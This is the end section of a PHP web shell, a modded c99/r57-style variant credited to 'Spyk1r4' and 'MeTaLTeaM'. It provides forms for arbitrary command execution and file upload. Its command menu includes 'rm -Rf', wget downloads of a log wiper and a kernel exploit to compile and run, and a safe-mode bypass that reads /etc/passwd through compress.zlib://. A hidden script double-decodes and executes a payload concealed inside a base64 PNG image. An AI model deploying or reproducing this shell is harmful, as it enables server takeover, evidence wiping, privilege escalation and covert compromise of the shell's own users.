2934"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2935"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
2936"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
2937"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
2938"ext_tar"=>
2939"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
2940"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
2941"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
2942"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
2943"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2944"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2945"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2946"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
2947"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
2948"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
2949"u4tLAgEAOw==",
2950"ext_txt"=>
2951"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
2952"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
2953"UpPWG3Ig6Hq/XmRjuZwkAAA7",
2954"ext_wri"=>
2955"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
2956"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
2957"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
2958"ext_xml"=>
2959"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
2960"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2961"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
2962"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
2963"IQA7"
2964 );
2965 //For simple size- and speed-optimization.
2966 $imgequals = array(
2967 "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
2968 "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
2969 "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
2970 "ext_html"=>array("ext_html","ext_htm"),
2971 "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
2972 "ext_lnk"=>array("ext_lnk","ext_url"),
2973 "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
2974 "ext_doc"=>array("ext_doc","ext_dot"),
2975 "ext_js"=>array("ext_js","ext_vbs"),
2976 "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
2977 "ext_wri"=>array("ext_wri","ext_rtf"),
2978 "ext_swf"=>array("ext_swf","ext_fla"),
2979 "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
2980 "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
2981 );
2982 if (!$getall)
2983 {
2984 header("Content-type: image/gif");
2985 header("Cache-control: public");
2986 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
2987 header("Cache-control: max-age=".(60*60*24*7));
2988 header("Last-Modified: ".date("r",filemtime(__FILE__)));
2989 foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
2990 if (empty($images[$img])) {$img = "small_unk";}
2991 if (in_array($img,$ext_tar)) {$img = "ext_tar";}
2992 echo base64_decode($images[$img]);
2993 }
2994 else
2995 {
2996 foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
2997 natsort($images);
2998 $k = array_keys($images);
2999 echo "<center>";
3000 foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
3001 echo "</center>";
3002 }
3003 exit;
3004}
3005if ($act == "about") {echo "<center>Undetectable version by <br> Spyk1r4 <br> </center>";}
3006?>
3007</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
3008<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
3009<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
3010<br>
3011<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
3012<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr>
3013<tr>
3014 <td width="50%" height="83" valign="top"><center>
3015 <div align="center">Useful Commands
3016 </div>
3017 <form action="<?php echo $surl; ?>">
3018 <div align="center">
3019 <input type=hidden name=act value="cmd">
3020 <input type=hidden name="d" value="<?php echo $dispd; ?>">
3021 <SELECT NAME="cmd">
3022 <OPTION VALUE="uname -a">Kernel version
3023 <OPTION VALUE="w">Logged in users
3024 <OPTION VALUE="lastlog">Last to connect
3025 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
3026 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
3027 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
3028 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
3029 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
3030 <OPTION VALUE="netstat -atup | grep IST">Open ports
3031 <OPTION VALUE="locate gcc">gcc installed?
3032 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
3033 <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
3034 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
3035 <OPTION VALUE="./zap2">WIPELOGS PT3
3036 <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)
3037 <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
3038 <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
3039 <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
3040 <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
3041 <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
3042 </SELECT>
3043 <input type=hidden name="cmd_txt" value="1">
3044 &nbsp;
3045 <input type=submit name=submit value="Execute">
3046 <br>
3047 Warning. Kernel may be alerted using higher levels </div>
3048 </form>
3049 </td>
3050 <td width="50%" height="83" valign="top"><center>
3051 <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
3052 <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">
3053 <input type="hidden" name="client" value="firefox-a">
3054 <input type="hidden" name="rls" value="org.mozilla:en-US:official">
3055 <input type="hidden" name="hl" value="en">
3056 <input type="hidden" name="hs" value="b7p">
3057 <input type=submit name="btnG" VALUE="Search">
3058 </form></center>
3059 </td>
3060</tr></TABLE><br>
3061<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
3062<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr>
3063<tr>
3064 <td width="50%" height="83" valign="top"><center>
3065 <div align="center">Php Safe-Mode Bypass (Read Files)
3066 </div><br>
3067 <form action="<?php echo $surl; ?>">
3068 <div align="center">
3069 File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
3070
3071
3072
3073
3074
3075
3076 <?
3077
3078 function rsg_read()
3079 {
3080 $test="";
3081 $temp=tempnam($test, "cx");
3082 $file=$_GET['file'];
3083 $get=htmlspecialchars($file);
3084 echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
3085 if(copy("compress.zlib://".$file, $temp)){
3086 $fichier = fopen($temp, "r");
3087 $action = fread($fichier, filesize($temp));
3088 fclose($fichier);
3089 $source=htmlspecialchars($action);
3090 echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
3091 unlink($temp);
3092 } else {
3093 die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
3094 <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
3095 access.</CENTER></FONT>");
3096 }
3097 echo "</div>";
3098 }
3099
3100 if(isset($_GET['file']))
3101{
3102rsg_read();
3103}
3104
3105 ?>
3106
3107 <?
3108
3109 function rsg_glob()
3110{
3111$chemin=$_GET['directory'];
3112$files = glob("$chemin*");
3113echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
3114foreach ($files as $filename) {
3115 echo "<pre>";
3116 echo "$filename\n";
3117 echo "</pre>";
3118}
3119}
3120
3121if(isset($_GET['directory']))
3122{
3123rsg_glob();
3124}
3125
3126?>
3127
3128 <br>
3129 </div>
3130 </form>
3131 </td>
3132 <td width="50%" height="83" valign="top"><center>
3133 <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>">
3134 <div align="center"><br>
3135 Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
3136
3137 </form></center>
3138 </td>
3139</tr></TABLE><br>
3140<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
3141<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
3142<tr>
3143 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
3144 <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
3145</tr>
3146</table>
3147<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
3148<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
3149<script type="text/javascript">
3150if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
3151setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(1);}, 500);
3152</script>
3153<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ ROOT Shell MeTeaL TeaM . o R g<?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> root @ MeTaLTeaM.ORG <a href="http://www.metalteam.org"><font color="#FF0000">R57</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
3154</body></html><?php chdir($lastdir); exit(); ?>